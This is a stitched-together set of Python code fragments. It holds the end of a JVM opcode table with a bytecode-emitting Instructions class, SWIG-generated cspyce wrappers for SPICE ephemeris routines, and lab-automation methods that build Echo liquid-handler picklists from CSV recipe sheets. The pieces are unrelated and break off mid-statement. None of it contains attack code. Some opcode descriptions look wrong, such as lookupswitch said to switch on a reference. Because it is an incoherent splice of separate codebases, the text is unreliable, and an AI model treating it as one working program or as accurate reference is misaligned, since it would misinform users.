the specified address", "inputs": [], "outputs": [], }, 0xa8: { "name": "jsr", "description": "Jump to subroutine and save return address", "inputs": [], "outputs": [OperandType.Reference], }, 0xa9: { "name": "ret", "description": "Return from subroutine", "inputs": [], "outputs": [], }, 0xaa: { "name": "tableswitch", "description": "Switch on an integer value", "inputs": [OperandType.Integer], "outputs": [], }, 0xab: { "name": "lookupswitch", "description": "Switch on a reference value", "inputs": [OperandType.Integer], "outputs": [], }, 0xac: { "name": "ireturn", "description": "Return an integer value from a method", "inputs": [OperandType.Integer], "outputs": [], }, 0xad: { "name": "lreturn", "description": "Return a long value from a method", "inputs": [OperandType.Long], "outputs": [], }, 0xae: { "name": "freturn", "description": "Return a float value from a method", "inputs": [OperandType.Float], "outputs": [], }, 0xaf: { "name": "dreturn", "description": "Return a double value from a method", "inputs": [OperandType.Double], "outputs": [], }, 0xb0: { "name": "areturn", "description": "Return an object reference from a method", "inputs": [OperandType.Reference], "outputs": [], }, 0xb1: { "name": "return", "description": "Return void from method", "inputs": [], "outputs": [], }, 0xb2: { "name": "getstatic", "description": "Get a static field value", "inputs": [], "outputs": get_field_type, }, 0xb3: { "name": "putstatic", "description": "Set a static field value", "inputs": get_field_type, "outputs": [], }, 0xb4: { "name": "getfield", "description": "Get a field value", "inputs": [], "outputs": get_field_type, }, 0xb5: { "name": "putfield", "description": "Set a field value", "inputs": get_field_type, "outputs": [], }, 0xb6: { "name": "invokevirtual", "description": "Invoke a virtual method on an object", "inputs": instance_method_input_types, "outputs": get_method_return_type, }, 0xb7: { "name": "invokespecial", "description": "Invoke a special method on an object", "inputs": instance_method_input_types, "outputs": get_method_return_type, }, 0xb8: { "name": "invokestatic", "description": "Invoke a static method", "inputs": get_method_input_types, "outputs": get_method_return_type, }, 0xb9: { "name": "invokeinterface", "description": "Invoke an interface method on an object", "inputs": instance_method_input_types, "outputs": get_method_return_type, }, 0xba: { "name": "invokedynamic", "description": "Invoke a dynamic method", "inputs": get_method_input_types, "outputs": get_method_return_type, }, 0xbb: { "name": "new", "description": "Create a new object", "inputs": [], "outputs": [OperandType.Reference], }, 0xbc: { "name": "newarray", "description": "Create a new array", "inputs": [OperandType.Integer], "outputs": [OperandType.Reference], }, 0xbd: { "name": "anewarray", "description": "Create a new array of references", "inputs": [], "outputs": [OperandType.Reference], }, 0xbe: { "name": "arraylength", "description": "Get the length of an array", "inputs": [OperandType.Reference], "outputs": [OperandType.Integer], }, 0xbf: { "name": "athrow", "description": "Throw an exception or error", "inputs": [OperandType.Reference], "outputs": [OperandType.Reference], }, 0xc0: { "name": "checkcast", "description": "Check if an object is of a certain type", "inputs": [OperandType.Reference], "outputs": [OperandType.Reference], }, 0xc1: { "name": "instanceof", "description": "Check if an object is of a certain type", "inputs": [OperandType.Reference], "outputs": [OperandType.Integer], }, 0xc2: { 
"name": "monitorenter", "description": "Enter monitor for an object", "inputs": [OperandType.Reference], "outputs": [], }, 0xc3: { "name": "monitorexit", "description": "Exit monitor for an object", "inputs": [OperandType.Reference], "outputs": [], }, 0xc4: { "name": "wide", "description": "Execute a wide instruction", "inputs": [], "outputs": [], }, 0xc5: { "name": "multianewarray", "description": "Create a new multi-dimensional array", "inputs": [], "outputs": [OperandType.Reference], }, 0xc6: { "name": "ifnull", "description": "Jump if value is null", "inputs": [OperandType.Reference], "outputs": [], }, 0xc7: { "name": "ifnonnull", "description": "Jump if value is not null", "inputs": [OperandType.Reference], "outputs": [], }, 0xc8: { "name": "goto_w", "description": "Jump to a new location in the code", "inputs": [], "outputs": [], }, 0xc9: { "name": "jsr_w", "description": "Jump to a new location in the code", "inputs": [], "outputs": [OperandType.Reference], }, 0xca: { "name": "breakpoint", "description": "Execute a breakpoint instruction", "inputs": [], "outputs": [], }, 0xfe: { "name": "impdep1", "description": "Implementation-dependent instruction", "inputs": [], "outputs": [], }, 0xff: { "name": "impdep2", "description": "Implementation-dependent instruction", "inputs": [], "outputs": [], }, } # </editor-fold> INSTRUCTIONS = dict(map(lambda item: (item[0], InstructionInfo(**item[1])), INSTRUCTIONS.items())) INSTRUCTIONS_BY_NAME: Dict[str, InstructionInfo] = dict(map(lambda item: (item[1].name, item[1]), INSTRUCTIONS.items())) class Instructions(object): _context: GenerateContext _instructions: Deque[InstructionsType] _stack: Stack def __init__(self, context: GenerateContext): self._instructions = deque() self._stack = Stack() self._context = context @property def instructions(self): return self._instructions.copy() @property def stack(self): return self._stack @staticmethod def _map_label(label: LabelType) -> Label: if isinstance(label, Label): return label else: return Label(label) def assemble(self) -> List[AssemblyInstruction]: return assemble(self._instructions) def append(self, instruction: Instruction, *operands: Operand) -> 'Instructions': if isinstance(instruction, Label): self._instructions.append(instruction) else: self._instructions.append((instruction, *operands)) self._stack.update_stack(instruction, *operands) return self def end_branch(self): self._stack.restore_stack() return self def else_branch(self): pass def label(self, name: LabelType) -> 'Instructions': return self.append(self._map_label(name)) def push_constant(self, constant: Constant) -> 'Instructions': if constant.index <= 255: self.append("ldc", constant) else: self.append("ldc_w", constant) return self def push_long(self, long: int) -> 'Instructions': if long == 0: self.append("lconst_0") elif long == 1: self.append("lconst_1") elif long in range(-128, 128): self.append("bipush", long) self.append("i2l") elif long in range(-32768, 32768): self.append("sipush", long) self.append("i2l") elif long in range(-2147483648, 2147483648): self.push_constant(self._context.cf.constants.create_integer(long)) self.append("i2l") elif long in range(-9223372036854775808, 9223372036854775808): self.append("ldc2_w", self._context.cf.constants.create_long(long)) else: raise ValueError(f"{long} greater than MAX_LONG") return self def push_integer(self, integer: int) -> 'Instructions': if integer < -32768: self.push_constant(self._context.cf.constants.create_integer(integer)) elif integer < -128: self.append("sipush", 
integer) elif integer < -1: self.append("bipush", integer) elif integer == -1: self.append("iconst_m1") elif integer <= 5: self.append(f"iconst_{integer}") elif integer <= 127: self.append("bipush", integer) elif integer <= 32767: self.append("sipush", integer) elif integer <= 2147483647: self.push_constant(self._context.cf.constants.create_integer(integer)) else: raise ValueError(f"{integer} greater than MAX_INT") return self def push_null(self): return self.append("aconst_null") # <editor-fold desc="Drops/Pops" defaultstate="collapsed" defaultstate="collapsed"> def pop(self) -> 'Instructions': return self.append("pop") def pop2(self) -> 'Instructions': return self.append("pop2") def drop(self) -> 'Instructions': return self.pop() def drop_long(self): return
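# push_integer above picks the smallest JVM opcode that can encode a constant:
# iconst_* for -1..5, bipush for one signed byte, sipush for one signed short, and an
# ldc of a constant-pool integer otherwise. A standalone sketch of just that decision
# (names here are illustrative; the real method also creates the constant-pool entry):
def pick_int_push_opcode(value):
    if value == -1:
        return "iconst_m1"
    if 0 <= value <= 5:
        return f"iconst_{value}"
    if -128 <= value <= 127:
        return "bipush"
    if -32768 <= value <= 32767:
        return "sipush"
    if -2147483648 <= value <= 2147483647:
        return "ldc"  # integer constant from the constant pool
    raise ValueError(f"{value} does not fit in a JVM int")

# pick_int_push_opcode(3)     -> 'iconst_3'
# pick_int_push_opcode(-100)  -> 'bipush'
# pick_int_push_opcode(70000) -> 'ldc'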
ConstSpiceChar * str2, ConstSpiceChar * str3, ConstSpiceChar * str4)""" return _cspyce0.spkezr_vector(str1, in11, str2, str3, str4) def spkgeo(targ, et, CONST_STRING, obs): """spkgeo(SpiceInt targ, SpiceDouble et, ConstSpiceChar * CONST_STRING, SpiceInt obs)""" return _cspyce0.spkgeo(targ, et, CONST_STRING, obs) def spkgeo_vector(k1, in11, str1, k2): """spkgeo_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceChar * str1, SpiceInt k2)""" return _cspyce0.spkgeo_vector(k1, in11, str1, k2) def spkgps(targ, et, CONST_STRING, obs): """spkgps(SpiceInt targ, SpiceDouble et, ConstSpiceChar * CONST_STRING, SpiceInt obs)""" return _cspyce0.spkgps(targ, et, CONST_STRING, obs) def spkgps_vector(k1, in11, str1, k2): """spkgps_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceChar * str1, SpiceInt k2)""" return _cspyce0.spkgps_vector(k1, in11, str1, k2) def spkltc(targ, et, arg3, arg4, stobs): """spkltc(SpiceInt targ, SpiceDouble et, ConstSpiceChar * arg3, ConstSpiceChar * arg4, ConstSpiceDouble [6] stobs)""" return _cspyce0.spkltc(targ, et, arg3, arg4, stobs) def spkltc_vector(k1, in11, str1, str2, in21): """spkltc_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in21)""" return _cspyce0.spkltc_vector(k1, in11, str1, str2, in21) def spkobj(spk): """spkobj(ConstSpiceChar * spk)""" return _cspyce0.spkobj(spk) def spkpos(arg1, et, arg3, arg4, arg5): """spkpos(ConstSpiceChar * arg1, SpiceDouble et, ConstSpiceChar * arg3, ConstSpiceChar * arg4, ConstSpiceChar * arg5)""" return _cspyce0.spkpos(arg1, et, arg3, arg4, arg5) def spkpos_vector(str1, in11, str2, str3, str4): """spkpos_vector(ConstSpiceChar * str1, ConstSpiceDouble * in11, ConstSpiceChar * str2, ConstSpiceChar * str3, ConstSpiceChar * str4)""" return _cspyce0.spkpos_vector(str1, in11, str2, str3, str4) def spkssb(targ, et, CONST_STRING): """spkssb(SpiceInt targ, SpiceDouble et, ConstSpiceChar * CONST_STRING)""" return _cspyce0.spkssb(targ, et, CONST_STRING) def spkssb_vector(k1, in11, str1): """spkssb_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceChar * str1)""" return _cspyce0.spkssb_vector(k1, in11, str1) def srfc2s(code, bodyid): """srfc2s(SpiceInt code, SpiceInt bodyid)""" return _cspyce0.srfc2s(code, bodyid) def srfcss(code, CONST_STRING): """srfcss(SpiceInt code, ConstSpiceChar * CONST_STRING)""" return _cspyce0.srfcss(code, CONST_STRING) def srfnrm(method, target, et, fixref, npts): """srfnrm(ConstSpiceChar * method, ConstSpiceChar * target, SpiceDouble et, ConstSpiceChar * fixref, SpiceInt npts)""" return _cspyce0.srfnrm(method, target, et, fixref, npts) def srfrec(body, longitude, latitude): """srfrec(SpiceInt body, SpiceDouble longitude, SpiceDouble latitude)""" return _cspyce0.srfrec(body, longitude, latitude) def srfrec_vector(k1, in11, in12): """srfrec_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceDouble * in12)""" return _cspyce0.srfrec_vector(k1, in11, in12) def srfs2c(arg1, arg2): """srfs2c(ConstSpiceChar * arg1, ConstSpiceChar * arg2)""" return _cspyce0.srfs2c(arg1, arg2) def srfscc(CONST_STRING, body_id): """srfscc(ConstSpiceChar * CONST_STRING, SpiceInt body_id)""" return _cspyce0.srfscc(CONST_STRING, body_id) def srfxpt(arg1, arg2, et, arg4, arg5, arg6, dvec): """srfxpt(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5, ConstSpiceChar * arg6, ConstSpiceDouble [3] dvec)""" return _cspyce0.srfxpt(arg1, arg2, et, arg4, arg5, arg6, dvec) def srfxpt_vector(str1, str2, in11, str3, str4, 
str5, in21): """srfxpt_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4, ConstSpiceChar * str5, ConstSpiceDouble * in21)""" return _cspyce0.srfxpt_vector(str1, str2, in11, str3, str4, str5, in21) def stcf01(catnam, westra, eastra, sthdec, nthdec): """stcf01(ConstSpiceChar * catnam, SpiceDouble westra, SpiceDouble eastra, SpiceDouble sthdec, SpiceDouble nthdec)""" return _cspyce0.stcf01(catnam, westra, eastra, sthdec, nthdec) def stcg01(index): """stcg01(SpiceInt index)""" return _cspyce0.stcg01(index) def stcl01(catfnm): """stcl01(ConstSpiceChar * catfnm)""" return _cspyce0.stcl01(catfnm) def stelab(pobj, vobs): """stelab(ConstSpiceDouble [3] pobj, ConstSpiceDouble [3] vobs)""" return _cspyce0.stelab(pobj, vobs) def stelab_vector(in21, in22): """stelab_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.stelab_vector(in21, in22) def stlabx(pobj, vobs): """stlabx(ConstSpiceDouble [3] pobj, ConstSpiceDouble [3] vobs)""" return _cspyce0.stlabx(pobj, vobs) def stlabx_vector(in21, in22): """stlabx_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.stlabx_vector(in21, in22) def stpool(item, nth, contin): """stpool(ConstSpiceChar * item, SpiceInt nth, ConstSpiceChar * contin)""" return _cspyce0.stpool(item, nth, contin) def str2et(CONST_STRING): """str2et(ConstSpiceChar * CONST_STRING)""" return _cspyce0.str2et(CONST_STRING) def subpnt(arg1, arg2, et, arg4, arg5, arg6): """subpnt(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5, ConstSpiceChar * arg6)""" return _cspyce0.subpnt(arg1, arg2, et, arg4, arg5, arg6) def subpnt_vector(str1, str2, in11, str3, str4, str5): """subpnt_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4, ConstSpiceChar * str5)""" return _cspyce0.subpnt_vector(str1, str2, in11, str3, str4, str5) def subpt(arg1, arg2, et, arg4, arg5): """subpt(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5)""" return _cspyce0.subpt(arg1, arg2, et, arg4, arg5) def subpt_vector(str1, str2, in11, str3, str4): """subpt_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4)""" return _cspyce0.subpt_vector(str1, str2, in11, str3, str4) def subslr(arg1, arg2, et, arg4, arg5, arg6): """subslr(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5, ConstSpiceChar * arg6)""" return _cspyce0.subslr(arg1, arg2, et, arg4, arg5, arg6) def subslr_vector(str1, str2, in11, str3, str4, str5): """subslr_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4, ConstSpiceChar * str5)""" return _cspyce0.subslr_vector(str1, str2, in11, str3, str4, str5) def subsol(arg1, arg2, et, arg4, arg5): """subsol(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5)""" return _cspyce0.subsol(arg1, arg2, et, arg4, arg5) def subsol_vector(str1, str2, in11, str3, str4): """subsol_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4)""" return _cspyce0.subsol_vector(str1, str2, in11, str3, str4) def surfnm(a, b, c, point): """surfnm(SpiceDouble a, SpiceDouble b, SpiceDouble c, ConstSpiceDouble [3] point)""" return 
_cspyce0.surfnm(a, b, c, point) def surfpt(positn, u, a, b, c): """surfpt(ConstSpiceDouble [3] positn, ConstSpiceDouble [3] u, SpiceDouble a, SpiceDouble b, SpiceDouble c)""" return _cspyce0.surfpt(positn, u, a, b, c) def surfpt_vector(in21, in22, in11, in12, in13): """surfpt_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22, ConstSpiceDouble * in11, ConstSpiceDouble * in12, ConstSpiceDouble * in13)""" return _cspyce0.surfpt_vector(in21, in22, in11, in12, in13) def surfpv(stvrtx, stdir, a, b, c): """surfpv(ConstSpiceDouble [6] stvrtx, ConstSpiceDouble [6] stdir, SpiceDouble a, SpiceDouble b, SpiceDouble c)""" return _cspyce0.surfpv(stvrtx, stdir, a, b, c) def surfpv_vector(in21, in22, in11, in12, in13): """surfpv_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22, ConstSpiceDouble * in11, ConstSpiceDouble * in12, ConstSpiceDouble * in13)""" return _cspyce0.surfpv_vector(in21, in22, in11, in12, in13) def sxform(arg1, arg2, et): """sxform(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et)""" return _cspyce0.sxform(arg1, arg2, et) def sxform_vector(str1, str2, in11): """sxform_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11)""" return _cspyce0.sxform_vector(str1, str2, in11) def termpt(method, ilusrc, target, et, fixref, abcorr, corloc, obsrvr, refvec, rolstp, ncuts, schstp, soltol, maxn): """termpt(ConstSpiceChar * method, ConstSpiceChar * ilusrc, ConstSpiceChar * target, SpiceDouble et, ConstSpiceChar * fixref, ConstSpiceChar * abcorr, ConstSpiceChar * corloc, ConstSpiceChar * obsrvr, ConstSpiceDouble [3] refvec, SpiceDouble rolstp, SpiceInt ncuts, SpiceDouble schstp, SpiceDouble soltol, SpiceInt maxn)""" return _cspyce0.termpt(method, ilusrc, target, et, fixref, abcorr, corloc, obsrvr, refvec, rolstp, ncuts, schstp, soltol, maxn) def timdef(arg1, arg2, lenout): """timdef(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceInt lenout)""" return _cspyce0.timdef(arg1, arg2, lenout) def timout(et, CONST_STRING): """timout(SpiceDouble et, ConstSpiceChar * CONST_STRING)""" return _cspyce0.timout(et, CONST_STRING) def tipbod(CONST_STRING, body, et): """tipbod(ConstSpiceChar * CONST_STRING, SpiceInt body, SpiceDouble et)""" return _cspyce0.tipbod(CONST_STRING, body, et) def tipbod_vector(str1, k1, in11): """tipbod_vector(ConstSpiceChar * str1, SpiceInt k1, ConstSpiceDouble * in11)""" return _cspyce0.tipbod_vector(str1, k1, in11) def tisbod(CONST_STRING, body, et): """tisbod(ConstSpiceChar * CONST_STRING, SpiceInt body, SpiceDouble et)""" return _cspyce0.tisbod(CONST_STRING, body, et) def tisbod_vector(str1, k1, in11): """tisbod_vector(ConstSpiceChar * str1, SpiceInt k1, ConstSpiceDouble * in11)""" return _cspyce0.tisbod_vector(str1, k1, in11) def tkvrsn(CONST_STRING): """tkvrsn(ConstSpiceChar * CONST_STRING) -> char *""" return _cspyce0.tkvrsn(CONST_STRING) def tparse(string): """tparse(ConstSpiceChar * string)""" return _cspyce0.tparse(string) def tpictr(sample): """tpictr(ConstSpiceChar * sample)""" return _cspyce0.tpictr(sample) def trace(matrix): """trace(ConstSpiceDouble [3][3] matrix) -> SpiceDouble""" return _cspyce0.trace(matrix) def trace_vector(in31): """trace_vector(ConstSpiceDouble * in31)""" return _cspyce0.trace_vector(in31) def trcoff(): """trcoff()""" return _cspyce0.trcoff() def trcdep(): """trcdep()""" return _cspyce0.trcdep() def trcnam(index): """trcnam(SpiceInt index)""" return _cspyce0.trcnam(index) def tsetyr(year): """tsetyr(SpiceInt year)""" return _cspyce0.tsetyr(year) def twopi(): """twopi() -> SpiceDouble""" return 
_cspyce0.twopi() def twovec(axdef, indexa, plndef, indexp): """twovec(ConstSpiceDouble [3] axdef, SpiceInt indexa, ConstSpiceDouble [3] plndef, SpiceInt indexp)""" return _cspyce0.twovec(axdef, indexa, plndef, indexp) def twovec_vector(in21, k1, in22, k2): """twovec_vector(ConstSpiceDouble * in21, SpiceInt k1, ConstSpiceDouble * in22, SpiceInt k2)""" return _cspyce0.twovec_vector(in21, k1, in22, k2) def tyear(): """tyear() -> SpiceDouble""" return _cspyce0.tyear() def ucrss(v1, v2): """ucrss(ConstSpiceDouble [3] v1, ConstSpiceDouble [3] v2)""" return _cspyce0.ucrss(v1, v2) def ucrss_vector(in21, in22): """ucrss_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.ucrss_vector(in21, in22) def unitim(epoch, arg2, arg3): """unitim(SpiceDouble epoch, ConstSpiceChar * arg2, ConstSpiceChar * arg3) -> SpiceDouble""" return _cspyce0.unitim(epoch, arg2, arg3) def unitim_vector(in11, str1, str2): """unitim_vector(ConstSpiceDouble * in11, ConstSpiceChar * str1, ConstSpiceChar * str2)""" return _cspyce0.unitim_vector(in11, str1, str2) def unload(CONST_STRING): """unload(ConstSpiceChar * CONST_STRING)""" return _cspyce0.unload(CONST_STRING) def unorm(v1): """unorm(ConstSpiceDouble [3] v1)""" return _cspyce0.unorm(v1) def unorm_vector(in21): """unorm_vector(ConstSpiceDouble * in21)""" return _cspyce0.unorm_vector(in21) def unormg(v1): """unormg(ConstSpiceDouble * v1)""" return _cspyce0.unormg(v1) def my_unormg_nomalloc(v1, v2, nd2): """my_unormg_nomalloc(ConstSpiceDouble * v1, SpiceDouble * v2, int * nd2)""" return _cspyce0.my_unormg_nomalloc(v1, v2, nd2) def unormg_vector(in21): """unormg_vector(ConstSpiceDouble * in21)""" return _cspyce0.unormg_vector(in21) def utc2et(CONST_STRING): """utc2et(ConstSpiceChar * CONST_STRING)""" return _cspyce0.utc2et(CONST_STRING) def vadd(v1, v2): """vadd(ConstSpiceDouble [3] v1, ConstSpiceDouble [3] v2)""" return _cspyce0.vadd(v1, v2) def vadd_vector(in21, in22): """vadd_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.vadd_vector(in21, in22) def vaddg(v1, v2): """vaddg(ConstSpiceDouble * v1, ConstSpiceDouble * v2)""" return _cspyce0.vaddg(v1, v2) def my_vaddg_nomalloc(v1, v2, v3, nd3): """my_vaddg_nomalloc(ConstSpiceDouble * v1, ConstSpiceDouble * v2, SpiceDouble * v3, int * nd3)""" return _cspyce0.my_vaddg_nomalloc(v1, v2, v3, nd3) def vaddg_vector(in21, in22): """vaddg_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.vaddg_vector(in21, in22) def vcrss(v1,
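# The wrappers above are thin pass-throughs to the underlying CSPICE routines, so the
# usual SPICE call pattern applies. A sketch assuming the standard toolkit semantics
# and that the required kernels (leapseconds, planetary ephemeris) have already been
# loaded; the epoch string and body names below are placeholders:
#
#   et = str2et("2024 JAN 01 12:00:00 TDB")
#   result = spkpos("MOON", et, "J2000", "LT+S", "EARTH")   # position + light time
#
# The *_vector variants (spkpos_vector, sxform_vector, ...) take an array of epochs in
# place of the scalar et and evaluate the same routine once per element.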
to the master mix manually, i.e., self.master_mix.append(material) after whatever check is required to avoid duplications. Returns 0 if the material was added successfully; returns 1 if an identical material was already in this EchoRun object's material list, so the new material was not added. ''' if material.name in self.material_dict.keys(): prior_mat = self.material_dict[material.name] if prior_mat.name == material.name \ and prior_mat.concentration == material.concentration \ and prior_mat.length == material.length \ and prior_mat.plate == material.plate: return 1 else: raise ValueError("Tried to add material " + material.name + \ " with concentration " + str(material.concentration) + \ ", length " + str(material.length) + ", and plate " + \ str(material.plate) + "; that material already exists " + \ "with concentration " + str(prior_mat.concentration) + \ ", length " + str(prior_mat.length) + ", and plate " + \ str(prior_mat.plate) + ".") else: self.material_dict[material.name] = material material.plate = self.plates[0] return 0 def build_picklist_from_txtl_setup_excel(self, input_filename): ''' CURRENTLY NONFUNCTIONAL DO NOT USE Build an Echo picklist based on a TX-TL setup spreadsheet (v2.1 or newer). ''' raise NotImplementedError("'build_picklist_from_txtl_setup_excel' " + \ "hasn't been implemented yet. Use " + \ "'build_picklist_from_txtl_setup_csvs'.") # Open the workbook and identify all the important sheets # workbook = pyxl.load_workbook(input_filename) # recipe_sheet = None # stock_sheet = None # layout_sheet = None # for sheet in workbook: # if sheet.title == "Recipe": # recipe = sheet # elif sheet.title == "Stocks": # stocks = sheet # elif sheet.title == "Layout": # layout = sheet def build_picklist_from_txtl_setup_csvs(self, stock_filename, recipe_filename): ''' Build an Echo picklist based on a pair of CSV documents produced from a TX-TL setup spreadsheet (v2.1). The stock sheet is a CSV describing materials on the source plate (plasmids, usually). The recipe sheet is a CSV describing the master mix and what materials from the stock sheet go in what destination wells, in what quantity. This function will overwrite any previous master mix defined for this EchoRun object, since the master mix is fully defined in the recipe sheet. ''' self.make_master_mix = True #################### # Read Input Files # #################### # Read in stock file stock_sheet = np.empty(shape = (12,5), dtype = object) with mt_open(stock_filename, 'rU') as stock_file: stock_reader = csv.reader(stock_file) rownum = -1 for row in stock_reader: rownum += 1 for colnum in range(len(row)): element = floatify(row[colnum]) stock_sheet[rownum, colnum] = element # Read in recipe file recipe_sheet = np.zeros(shape = (384+20, 16), dtype = object) with mt_open(recipe_filename, 'rU') as recipe_file: recipe_reader = csv.reader(recipe_file) rownum = -1 for row in recipe_reader: rownum += 1 if rownum >= recipe_sheet.shape[0]: print("Warning -- You are trying to add to more than " + \ "384 wells in the destination plate. 
" + \ "Extra wells will be clipped.") break for colnum in range(len(row)): element = floatify(row[colnum]) if element: recipe_sheet[rownum, colnum] = element # Set some magic numbers based on the recipe file self.rxn_vol = float(recipe_sheet[11,10]) * 1e3 self.extract_fraction = float(recipe_sheet[12,2]) self.buffer_fraction = 0.75 - self.extract_fraction self.mm_excess = float(recipe_sheet[11,12]) ###################### # Register Materials # ###################### # Magic numbers here are spreadsheet positions of volumes to add. material_total_vols = [0]*10 for i in range(len(material_total_vols)): for j in range(20,recipe_sheet.shape[0]): if recipe_sheet[j, 5+i]: material_total_vols[i] += recipe_sheet[j, 5+i] * 1e3 # Assign source wells and register materials # Register TX-TL master mix if not "txtl_mm" in self.material_dict: self.material_dict['txtl_mm'] = MasterMix(self.plates[0], extract_fraction = self.extract_fraction, mm_excess = self.mm_excess, add_txtl = False, rxn_vol = self.rxn_vol) txtl = self.material_dict["txtl_mm"] # Register Water self.add_material(EchoSourceMaterial("water", 1, 0, self.plates[0])) water = self.material_dict["water"] # Register other materials stocks = [] for i in range(len(material_total_vols)): if stock_sheet[i+2,1] == "": for j in range(i+1, len(material_total_vols)): if stock_sheet[i+2,1] != "": raise RuntimeWarning("You left a blank row in your " + \ "stock file. This will cause alignment shifts in "+\ "your recipe sheet and you will almost surely " + \ "use the wrong amounts of ingredients. Are you " + \ "sure this is what you want?") continue material_name = stock_sheet[i+2, 1] if isinstance(material_name, float): continue material_concentration = stock_sheet[i+2, 2] material_length = stock_sheet[i+2, 3] new_material = EchoSourceMaterial(material_name, material_concentration, material_length, self.plates[0]) is_duplicate_material = self.add_material(new_material) if not is_duplicate_material: stocks.append(new_material) ################## # Register picks # ################## first_row = 20 last_row = 20 + 384 n_rxns = 0 for rownum in range(first_row, last_row): # Check to see if there's a well used in this row; if not, skip it. if recipe_sheet[rownum, 1] == 0: continue n_rxns += 1 well = recipe_sheet[rownum, 1] if well == 0: raise ValueError(("Error on row for ID #%d of recipe sheet: " +\ "Must have a destination well.") % \ (rownum - 21)) if well in self.reactions.keys(): raise ValueError("Well %s already has a reaction!" \ % well) self.reactions[well] = WellReaction(self.rxn_vol, well) # Material picks (magic number warning -- magic numbers define # positions of relevant blocks in the recipe sheet) for mat_num in range(len(material_total_vols)): colnum = mat_num + 5 volume = recipe_sheet[rownum, colnum] * 1e3 if volume != None and volume > 0: source_material = stocks[mat_num] self.reactions[well].add_volume_of_material(source_material, volume) # Water picks (magic number warning -- magic number defines # positions of relevant blocks in the recipe sheet) volume = recipe_sheet[rownum, 3] * 1e3 self.reactions[well].fill_with(water) # Master Mix picks (magic number warning -- magic number defines # positions of relevant blocks in the recipe sheet) volume = recipe_sheet[rownum, 4] * 1e3 self.reactions[well].add_volume_of_material(txtl, volume) # Add materials to the master mix. 
for i in range(11,17): if recipe_sheet[i,4] == None or recipe_sheet[i,4] == 0: continue name = recipe_sheet[i,0] stock = recipe_sheet[i,1] final = recipe_sheet[i,2] material = EchoSourceMaterial(name, stock, 0, self.plates[0]) txtl.add_material(material, final) def load_source_plate(self, input_filename, name_col, conc_col, len_col, well_col, plate_col, header = True): ''' Enter new materials from a CSV spreadsheet. Args: input_filename -- name of the CSV. name_col -- Name of the column containing the name of each material, either as a string ("C") or a 0-indexed int (2) conc_col -- Name of the column containing the concentration of each material, in ng/uL if the material is dsDNA or in nM or relative concentration otherwise, either as a string ("C") or a 0-indexed int (2) len_col -- Name of the column containing the length of any dsDNA material, either as a string ("C") or a 0-indexed int (2), or None if no such column exists (for sheets containing only non-dsDNA materials) well_col -- Name of the column containing the well location of each material, either as a string ("C") or a 0-indexed int (2) plate_col -- Name of the column containing the name of the plate the material can be found on, either as a string ("C") or a 0-indexed int (2), or None if no such column exists. Plate will default to Plate[#], where # will increment with each source plate file (without a plate_col) loaded. header -- True iff there is a header row. Decides whether or not to skip the first line of each file ''' ##################### # Process arguments # ##################### name_idx = process_column_argument(name_col) conc_idx = process_column_argument(conc_col) len_idx = process_column_argument(len_col) well_idx = process_column_argument(well_col) plate_idx = process_column_argument(plate_col) ############# # Read file # ############# with mt_open(input_filename, 'rU') as input_file: reader = csv.reader(input_file) # Skip first row if it's a header if header: next(reader) for row in reader: name = row[name_idx] concentration = floatify(row[conc_idx]) well = row[well_idx] if len_idx != None: length = int(floatify(row[len_idx])) else: length = 0 if plate_idx == None: plate_name = "1" else: plate_name = row[plate_idx] plate = None for p in self.plates: if p.name == plate_name: plate = p break if not plate: plate = SourcePlate(SPname = plate_name) material = EchoSourceMaterial(name, concentration, length, plate) self.add_material(material) if self.material_dict[name].wells == None: self.material_dict[name].wells = [well] else: self.material_dict[name].wells.append(well) def build_picklist_from_association_spreadsheet(self, input_filename, well_column, header = True, fill_with_water = False, water_name = None): ''' Make an Echo picklist based on an association spreadsheet, which is a CSV file where 1) each line is a reaction and 2) lines contains alternating columns of material
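# --- Editor's usage sketch (not from the original module) -------------------
# How the picklist-building entry points above might be driven. `echo_run`
# is assumed to be an already-constructed EchoRun object; the file names and
# column letters below are placeholders, not values taken from this file.
def _example_build_picklists(echo_run):
    # TX-TL setup workflow: stock + recipe CSVs exported from the v2.1 sheet.
    echo_run.build_picklist_from_txtl_setup_csvs("stocks.csv", "recipe.csv")

    # Association-spreadsheet workflow (normally a separate run): register
    # source materials first, then build picks from the association CSV
    # whose destination wells live in column "E".
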